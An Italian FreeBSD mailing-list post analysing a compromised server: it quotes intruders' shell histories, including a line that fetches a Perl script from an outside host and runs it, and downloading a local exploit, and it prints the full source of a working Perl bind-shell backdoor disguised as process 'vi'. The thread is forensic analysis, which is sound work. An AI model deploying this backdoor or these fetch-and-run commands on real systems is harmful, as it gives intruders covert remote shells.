hacking ... lo studiamo ?

Dario Freni saturnero a gufi.org
Lun 28 Nov 2005 20:15:41 CET


Gianmarco Giovannelli wrote:
> 
> Ho ricevuto questo messaggio da **** a proposito di un server bucato :-)
> 
>>      2  21:09   cd .psybsd
>>      3  21:09   dir -la
>>      4  21:09   cat psybnc.conf
>>      5  21:10   rm -rf *
>>      6  21:10   cd ..
>>      7  21:10   cd ...
>>      8  21:10   ls
>>      9  21:10   cd psybnc
>>     10  21:10   ls
>>     11  21:10   export PATH="."
>>     12  21:10   ./swapper
>>     13  21:10   exit
>>     14  16:49   w
>>     15  16:49   ps -aux
>>     16  16:49   dir -la
>>     17  16:49   cd /var/tmp
>>     18  16:49   dir -la
>>     19  16:49   cd ...
>>     20  16:49   dir
>>     21  16:49   cd psybnc
>>     22  16:49   ls
>>     23  16:50   export
>>     24  16:50   swapper
>>     25  16:50   ps -aux
>>     26  16:50   exit
>>     27  16:54   cat /etc/passwd
>>     28  16:56   last
>>     29  16:59   last
>>     30  16:59   w
>>     31  16:59   ps -aux
>>     32  16:59   exit
>>     33  3:45    uname -a
>>     34  3:45    bash
>>     35  3:45    sh
>>     36  3:49    exit
>>     37  6:45    bash
>>     38  6:45    sh
>>     39  6:51    exit
>>     40  11:59   /usr/bin/perl
>>     41  11:59   ps x
>>     42  11:59   ls
>>     43  11:59   vi bds
>>     44  11:59   perl bds
>>     45  12:00   ps x
>>     46  12:00   kill -9 76439 43695
>>     47  12:00   ps x
>>     48  12:00   exit
>>     49  12:03   wget
>>     50  12:03   curl
>>     51  12:04   emacs
>>     52  12:04   gwget
>>     53  12:04   kget
>>     54  12:04   kget www.com.com/q/1
>>     55  12:05   kget www.com.com/q~./1
>>     56  12:05   kget www.com.com/q.1
>>     57  12:05   ls
>>     58  12:05   kget www.com.com/q.1 1
>>     59  12:05   touch 1
>>     60  12:05   kget www.com.com/q.1 1
>>     61  12:05   kget 1
>>     62  12:05   cat 1
>>     63  12:05   rm 1
>>     64  12:06   gmake
>>     65  12:06   fetch
>>     66  12:07   fetch www.com.com
>>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
>>     68  12:07   ls
>>     69  12:08   head bds.txt
>>     70  12:08   rm bds.txt
>>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; mv 
>> bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
>>     72  12:09   ps x
>>     73  12:09   kill -9 77329
>>     74  12:10   cd ..
>>     75  12:10   cd /
>>     76  12:10   ls
>>     77  12:13   exit
>>     78  14:37   fetch slickland.com/xpl/bsdpass
>>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
>>     80  14:38   chmod +x bsdpass
>>     81  14:38   ./bsdpass
>>     82  14:38   rm bsdpass
>>     83  14:38   vi bsdpass.c
>>     84  14:38   gcc -o bsdpass bsdpass.c
>>     85  14:39   ./bsdpass
>>     86  14:40   ls
>>     87  14:40   cat kmem
>>     88  14:40   cat sendfile1
>>     89  14:40   rm sendfile1
>>     90  14:40   rm kmem
>>     91  14:40   rm bsdpass.c
>>     92  14:40   ls
>>     93  14:40   ftp ftp.slickland.com
>>     94  14:42   ftp ftp.slickland.com
>>     95  14:43   rm bsdpass
>>     96  14:43   ls
>>     97  14:43   exit
>>     98  23:48   history
>>     99  23:48   history > hackterra.log
>>    100  23:48   who
>>    101  23:50   history
>>
>> ecco dbs.txt
>> #!/usr/bin/perl ^M
>> $port = 4132; ^M
>> $hide = "vi";^M
>> unlink($0); $0 = $hide . "\0" x16;^M
>> $SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';^M
>> $SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};^M
>> use Socket; $proto = getprotobyname('tcp');^M
>> socket(SERVER,PF_INET,SOCK_STREAM,$proto);^M
>> setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));^M
>> bind(SERVER,sockaddr_in($port,INADDR_ANY));^M
>> if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port $port\n"); 
>> } else { die "listen: $!" };^M
>> for(;$paddr = accept(CLIENT,SERVER);close CLIENT)^M
>> {^M
>>    
>> open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");^M
>>    print("## BDS backdoor by Slick\n\n");^M
>>    while(1)^M
>>    {^M
>>    print("[cmd]# ");^M
>>    if (fork() == 0) {^M
>>      $cmd=<STDIN>;^M
>>      chomp($cmd);^M
>>      exec($cmd);^M
>>      exit 0;^M
>>                     }^M
>>    wait;^M
>>    }^M
>>    close(STDIN);close(STDOUT);close(STDERR);^M
>> }
>> ~

Semplice backdoor che abre un servizio di rete sulla 4132, risulta come 
processo "vi" e apre una shell a chi si connette.


 >>
 >> mi piacerebbe vedere il file bsdpass.c

Da una analisi sul bsdpass binario esce fuori una funzione dolisten, e 
chiamate bind(), connect(), sendfile() (?) e una stringa cosi`:

/usr/bin/chsh -s /bin/sh

Una backdoor remota anche questa, suppongo.


> ed ecco l'utente info (pwd info, con tanto di shell  :-)
> 
>> ecco cosa ha fatto info
>>
>>      2  22:15   cd
>>      3  22:15   w
>>      4  22:15   cd ..
>>      5  22:15   cd ..
>>      6  22:15   cd ..
>>      7  22:15   cd ..
>>      8  22:15   cd ..
>>      9  22:15   cd ..
>>     10  22:15   cd ..
>>     11  22:15   cd /
>>     12  22:15   cd
>>     13  22:15   cd //
>>     14  22:15   cd .
>>     15  22:16   cd usr
>>     16  22:16   var
>>     17  22:16   exit
>>     18  6:58    cd /var/tmp/" "
>>     19  6:58    cd .psybsd
>>     20  6:58    ./httpd
>>     21  6:59    cd
>>     22  6:59    w
>>     23  6:59    cd ..
>>     24  6:59    cd ..
>>     25  6:59    exit
>>     26  7:10    cd /var/tmp
>>     27  7:10    ls
>>     28  7:10    cd" "
>>     29  7:10    cd " "
>>     30  7:10    ls
>>     31  7:10    cd .psybsd
>>     32  7:10    ./http
>>     33  7:10    ./httpd
>>     34  7:10    cd
>>     35  7:10    cd ..
>>     36  7:10    cd ..
>>     37  7:10    cd ..
>>     38  7:10    cd ..
>>     39  7:10    w
>>     40  7:10    exit
>>     41  21:36   cd /var/tmp
>>     42  21:36   ls
>>     43  21:36   cd .``.``.
>>     44  21:36   cd '" "cd " "
>>     45  21:36   cd " "
>>     46  21:36   ls
>>     47  21:36   cd .psybsd
>>     48  21:36   ./httpd
>>     49  21:36   cd
>>     50  21:36   exit
>>     51  17:56   w
>>     52  17:56   cd /var/tmp
>>     53  17:56   ls
>>     54  17:56   cd " "
>>     55  17:56   ls
>>     56  17:56   cd .psybsd
>>     57  17:56   ls
>>     58  17:56   pic psybnc.conf
>>     59  17:57   ls
>>     60  17:57   pic menuconf
>>     61  17:58   pic psybnc.conf.old
>>     62  17:59   pic log
>>     63  18:05   uname -a
>>     64  18:05   uname -s
>>     65  18:05   w
>>     66  18:06   cd ..
>>     67  18:06   cd ..
>>     68  18:06   cd
>>     69  18:06   cd ..
>>     70  18:06   cd ..
>>     71  18:06   rm -rf .psybsd
>>     72  18:06   ls
>>     73  18:06   cd
>>     74  18:06   cd ..
>>     75  18:06   exit
>>     76  18:06   cd /var/tmp/" "
>>     77  18:07   rm -rf .psybsd
>>     78  18:07   ls
>>     79  18:07   ls -all
>>     80  18:07   ftp
>>     81  18:10   ps -x
>>     82  18:10   killall -9 10745
>>     83  18:11   cd .psybsd
>>     84  18:11   ls
>>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
>>     86  18:11   rm -rf psyBNC*
>>     87  18:11   mv psybnc .psybsd
>>     88  18:12   cd .psybsd
>>     89  18:12   make
>>     90  18:14   mv psybnc sshd
>>     91  18:14   ls
>>     92  18:14   ps -x
>>     93  18:14   kill -9 10745
>>     94  18:16   ./sshd
>>     95  18:18   uname -a
>>     96  18:19   cat /etc/hosts
>>     97  18:20   cd
>>     98  18:20   cd ..
>>     99  18:20   cd ..
>>    100  18:20   exit
> 
> 
> 
> Secondo voi che facevano ?

Installavano psybnc, ovvero un bouncer per collegarsi a irc. il binario 
l'hanno rinominato in sshd in modo che dal ps non risultasse niente di 
strano (a parte il ./ iniziale, lusers). E` una sorta di proxy per irc 
che si usa per anonimizzarsi in reti dove l'ip e` pubblicamente visibile.

Ciao,
Dario

-- 
Dario Freni (saturnero a gufi.org)
Gruppo Utenti FreeBSD Italia (http://www.gufi.org)
GPG Public key at http://www.saturnero.net/saturnero.asc


Maggiori informazioni sulla lista esperti